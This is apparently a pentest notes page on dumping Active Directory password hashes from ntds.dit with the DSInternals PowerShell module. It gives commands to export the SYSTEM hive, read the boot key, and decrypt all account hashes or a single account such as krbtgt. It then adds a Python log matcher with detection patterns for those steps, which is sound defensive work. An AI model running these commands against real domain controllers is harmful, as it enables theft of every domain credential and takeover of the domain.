# Dumping the contents of ntds.dit files using PowerShell

You'll need the DSInternals module (<https://github.com/MichaelGrafnetter/DSInternals>) for this. Installation instructions can be found on its GitHub page.

## Obtaining the bootkey stored in the SYSTEM hive

This can be done by exporting the SYSTEM hive using `reg.exe`:

```powershell
reg.exe save hklm\system system
```

From there you can retrieve the bootkey using `Get-BootKey`, pointing `-SystemHivePath` at the SYSTEM hive file:

```powershell
Get-BootKey -SystemHivePath 'D:\Windows\System32\config\SYSTEM'
```

## Dumping the contents of ntds.dit

We then load the database and decrypt the password hashes of all accounts, passing the value returned by `Get-BootKey` as `-BootKey`:

```powershell
Get-ADDBAccount -All -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"
```

We can also get a single account by specifying its distinguishedName, objectGuid, objectSid or sAMAccountName attribute:

```powershell
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=Adatum,DC=com' -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"
```
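For defenders, the commands above leave recognisable strings in process command-line and PowerShell script block logs. The following is an added example, not part of the original page or the DSInternals project: a small matcher that flags the hive export, the boot key read and the `ntds.dit` read, then lists hosts where both halves of the procedure were logged. The rule names, host names and sample events are constructed, and it assumes the log text has already been collected as `(host, text)` pairs.

```python
import re

# Constructed sample: (host, logged command line or PowerShell script block text).
SAMPLE_EVENTS = [
    ("DC01", r"reg.exe save hklm\system system"),
    ("DC01", r"Get-ADDBAccount -All -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey <redacted>"),
    ("WS07", r"reg.exe query hklm\system\CurrentControlSet\Control"),
    ("FS02", r"Get-BootKey -SystemHivePath 'D:\Windows\System32\config\SYSTEM'"),
]

# "reg save" of the whole SYSTEM hive; the lookahead rejects subkeys of it.
REG_SAVE_SYSTEM = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\system(?=["\s]|$)',
    re.IGNORECASE,
)
BOOTKEY_CMDLET = re.compile(r"\bGet-BootKey\b", re.IGNORECASE)
ADDB_CMDLET = re.compile(r"\bGet-ADDBAccount\b", re.IGNORECASE)
NTDS_FILE = re.compile(r"ntds\.dit", re.IGNORECASE)
ALL_SWITCH = re.compile(r"(?<!\S)-All\b", re.IGNORECASE)


def classify(text):
    """Return the rule names matched by one logged command or script block."""
    hits = []
    if REG_SAVE_SYSTEM.search(text):
        hits.append("system-hive-export")
    if BOOTKEY_CMDLET.search(text):
        hits.append("bootkey-read")
    if ADDB_CMDLET.search(text) and NTDS_FILE.search(text):
        hits.append("ntds-all-accounts" if ALL_SWITCH.search(text) else "ntds-single-account")
    return hits


def hosts_with_full_chain(events):
    """Hosts that logged both a boot key step and an ntds.dit read."""
    per_host = {}
    for host, text in events:
        per_host.setdefault(host, set()).update(classify(text))
    key_steps = {"system-hive-export", "bootkey-read"}
    return sorted(
        host for host, rules in per_host.items()
        if rules & key_steps and any(r.startswith("ntds-") for r in rules)
    )


if __name__ == "__main__":
    for host, text in SAMPLE_EVENTS:
        print(host, classify(text))
    print("full chain:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Because the hive and database are often copied off and processed elsewhere, a single `system-hive-export` hit on a domain controller is worth triaging on its own, without waiting for the full chain.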

## References

{% embed url="<https://github.com/MichaelGrafnetter/DSInternals>" %}

{% embed url="<https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/>" %}
